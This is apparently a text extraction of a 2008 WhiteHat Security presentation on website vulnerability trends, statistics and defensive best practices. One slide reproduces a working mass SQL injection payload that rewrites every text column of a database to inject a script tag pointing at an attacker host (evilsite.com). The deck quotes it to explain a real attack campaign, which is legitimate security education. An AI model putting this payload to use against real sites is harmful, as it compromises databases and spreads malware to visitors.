© 2008 WhiteHat Security, Inc. Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Security, How to Fight Them.” Jeremiah Grossman WhiteHat Security founder & CTO
May 24, 2015
© 2008 WhiteHat Security, Inc.
Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Security, How to Fight Them.”
Jeremiah GrossmanWhiteHat Security founder & CTO
© 2008 WhiteHat Security, Inc.
Jeremiah GrossmanWhiteHat Security Founder & CTOTechnology R&D and industry evangelist(InfoWorld's CTO Top 25 for 2007)
Frequent international conference speakerCo-founder of the Web Application Security ConsortiumCo-author: Cross-Site Scripting Attacks
Former Yahoo! information security officer
2
Job Description: Hack Everything!
Official Title“the hacker yahoo”
3
Protect this website and the ~599 others
Find the vulnerabilities before the bad guys
4
5
© 2008 WhiteHat Security, Inc.
WhiteHat Sentinel• Unlimited Assessments – customer controlled and expert managed – the ability to scan websites no matter how big or how often they change
• Coverage – authenticated scans to identify technical vulnerabilities and custom testing to uncover business logical flaws
• Virtually Eliminate False Positives – Operations Team verifies results and assigns the appropriate severity and threat rating
• Development and QA – WhiteHat Satellite Appliance allows us to service intranet accessible systems remotely
• Improvement & Refinement – real-world scans enable fast and efficient updates
6
© 2008 WhiteHat Security, Inc.
SymantecQualysNessusnCircle
WhiteHat Security
“well-known” vulnerabilities
Vulnerability Stack
7
Custom Web Applications, Custom Vulnerabilities
Data is unique from reports distributed by Symantec, Mitre (CVE), IBM (ISS) X-Force, SANS, and others. These organizations track publicly disclosed vulnerabilities in commercial and open source software products, which may contain Web application flaws as well. WhiteHat Security’s data is different because it focuses solely on previously unknown vulnerabilities in custom web applications, code unique to that organization, on real-world websites
168,000,000 websites
millions more added per month
8
809,000 websites use SSL
protecting password, credit card numbers, social security numbers,
and our email (if we’re lucky).
9
9 out of 10 websites have vulnerabilities
allowing hackers unauthorized access
10
hacked
11
A new infected Web page is discovered every:5 seconds 24 hours a day365 days a year
Over 79% of websites hosting malicious code are legitimate(compromised by attackers)
12
© 2008 WhiteHat Security, Inc.
Likelihood that a website has a vulnerability, by Class
WhiteHat Security: Top 1013
© 2008 WhiteHat Security, Inc.
Likelihood that a website has a vulnerability, by severity
But how bad is it really?
Websites with Urgent, Critical, or High severity issues technically would not pass PCI compliance
14
© 2008 WhiteHat Security, Inc.
Percentage of vulnerabilities ranked by severity
Another way to look at the badness15
© 2008 WhiteHat Security, Inc.
Overall vulnerability population16
© 2008 WhiteHat Security, Inc.
Technology Breakdownfile extensions
17
© 2008 WhiteHat Security, Inc.
Industry VerticalsPercentage of websites with either URGENT, CIRTICAL or HIGH severity vulnerabilities
ranked by industry
18
© 2008 WhiteHat Security, Inc.
Worst of the WorstPercentage of vulnerability classes in overall
population ranked by industry
19
© 2008 WhiteHat Security, Inc.
Data input correlation20
Average inputs per website:154Ratio of vulnerability/inputs: 2.2%
Average Time to Fix in Days
180 270 365
21
Website Founded
Amazon 1994
Yahoo 1995
eBay 1995
Bank of America 1997
Google 1998
MySpace 2003
YouTube 2005
Vulnerability Attack
Buffer Overflow 1996
Command Injection 1996
SQL Injection 2004
XSS 2005
Predictable Resource Location ?
HTTP Response Splitting 2005 / ?
CSRF ?
More major websites were launched before significant classes of attack were “well-known”
22
If there’s just 1 vulnerability on 90% of the SSL websites...Other reports say an average of 7
728,100 total vulnerabilities
23
XSSed.com has reported:
20,843 total vulnerabilities
1,072 fixed (5%)
24
25
1. Google recon for weak websites (*.asp, *.php)2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server infecting their machine with trojans.4. Botnets form with then continue SQL injecting websites
Mass SQL Injection
26
DECLARE @T varchar(255), @C varchar(255);DECLARE Table_Cursor CURSOR FORSELECT a.name, b.nameFROM sysobjects a, syscolumns bWHERE a.id = b.id AND a.xtype = 'u' AND(b.xtype = 99 ORb.xtype = 35 ORb.xtype = 231 ORb.xtype = 167);OPEN Table_Cursor;FETCH NEXT FROM Table_Cursor INTO @T, @C;WHILE (@@FETCH_STATUS = 0) BEGINEXEC('update [' + @T + '] set [' + @C + '] =rtrim(convert(varchar,[' + @C + ']))+''<script src=http://evilsite.com/1.js></script>''');FETCH NEXT FROM Table_Cursor INTO @T, @C;END;CLOSE Table_Cursor;DEALLOCATE Table_Cursor;
27
28
2006, 0.3% of all Internet queries return at least one URL containing malicious content.
2007 - 1.3%
2008 - ?
29
30
31
© 2008 WhiteHat Security, Inc.
Best PracticesAsset Tracking – Find your websites, assign a responsible party, and rate their importance to the business. Because you can’t secure what you don’t know you own.
Measure Security – Perform rigorous and on-going vulnerability assessments, preferably every week. Because you can’t secure what you can’t measure.
Development Frameworks – Provide programmers with software development tools enabling them to write code rapidly that also happens to be secure. Because, you can’t mandate secure code, only help it.
Defense-in-Depth – Throw up as many roadblocks to attackers as possible. This includes custom error messages, Web application firewalls, security with obscurity, and so on. Because 9 in 10 websites are already insecure, no need to make it any easier.
32
For more information visit: www.whitehatsec.com/
Jeremiah Grossman, founder and CTOblog: http://jeremiahgrossman.blogspot.com/email: [email protected]
Thank You